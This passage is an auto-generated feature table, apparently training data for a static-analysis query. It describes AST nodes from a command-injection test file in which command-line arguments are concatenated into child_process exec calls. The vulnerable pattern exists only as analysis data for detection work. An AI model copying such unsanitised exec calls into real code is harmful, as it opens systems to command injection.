require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:28 | cp.exec ... taint4) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:28 | cp.exec ... taint4) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:28 | cp.exec ... taint4) | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:28 | cp.exec ... taint4) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:28 | cp.exec ... taint4) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:28 | exceptional return of cp.exec ... taint4) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:28 | exceptional return of cp.exec ... taint4) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:28 | exceptional return of cp.exec ... taint4) | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:28 | exceptional return of cp.exec ... taint4) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:28 | exceptional return of cp.exec ... taint4) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:5:72:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:5:72:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:5:72:8 | exec | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:5:72:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:5:72:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:10:72:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:10:72:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:10:72:18 | "cmd.sh " | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:10:72:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:10:72:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:10:72:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:10:72:27 | "cmd.sh " + taint4 | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:22:72:27 | taint4 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:22:72:27 | taint4 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:22:72:27 | taint4 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:22:72:27 | taint4 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:22:72:27 | taint4 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:22:72:27 | taint4 | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:1:93:2 | (functi ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:1:93:2 | (functi ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:1:93:2 | (functi ... T OK\\n}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:1:103:2 | (functi ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:1:103:2 | (functi ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:1:103:2 | (functi ... T OK\\n}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:1:103:2 | exceptional return of (functi ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:1:103:2 | exceptional return of (functi ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:1:103:2 | exceptional return of (functi ... T OK\\n}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:75:1 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:75:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:75:1 | cp | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:75:1 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:75:1 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:75:1 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:75:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:75:1 | require | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:75:1 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:75:1 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:75:1 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:75:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:75:1 | this | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:75:1 | this | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:75:1 | this | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:93:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:93:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:93:1 | 'arguments' object of anonymous function | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:93:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:93:1 | 'arguments' object of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:93:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:93:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:93:1 | exceptional return of anonymous function | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:93:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:93:1 | exceptional return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:93:1 | functio ... OT OK\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:93:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:93:1 | functio ... OT OK\\n} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:93:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:93:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:93:1 | return of anonymous function | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:93:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:75:2:93:1 | return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:8:76:11 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:8:76:11 | argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:8:76:11 | argv | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:8:76:11 | argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:8:76:11 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:8:76:35 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:8:76:35 | argv | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:8:76:35 | argv | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:8:76:35 | argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:8:76:35 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:8:76:35 | argv = ... lice(2) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:8:76:35 | argv = ... lice(2) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:8:76:35 | argv = ... lice(2) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:8:76:35 | argv = ... lice(2) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:8:76:35 | argv = ... lice(2) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:21 | process | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:21 | process | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:21 | process | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:21 | process | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:21 | process | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:26 | process.argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:26 | process.argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:26 | process.argv | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:26 | process.argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:26 | process.argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:32 | process.argv.slice | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:32 | process.argv.slice | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:32 | process.argv.slice | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:32 | process.argv.slice | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:32 | process.argv.slice | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:35 | exceptional return of process ... lice(2) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:35 | exceptional return of process ... lice(2) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:35 | exceptional return of process ... lice(2) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:35 | exceptional return of process ... lice(2) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:35 | exceptional return of process ... lice(2) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:35 | process ... lice(2) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:35 | process ... lice(2) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:35 | process ... lice(2) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:35 | process ... lice(2) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:35 | process ... lice(2) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:23:76:26 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:23:76:26 | argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:23:76:26 | argv | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:23:76:26 | argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:23:76:26 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:28:76:32 | slice | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:28:76:32 | slice | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:28:76:32 | slice | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| 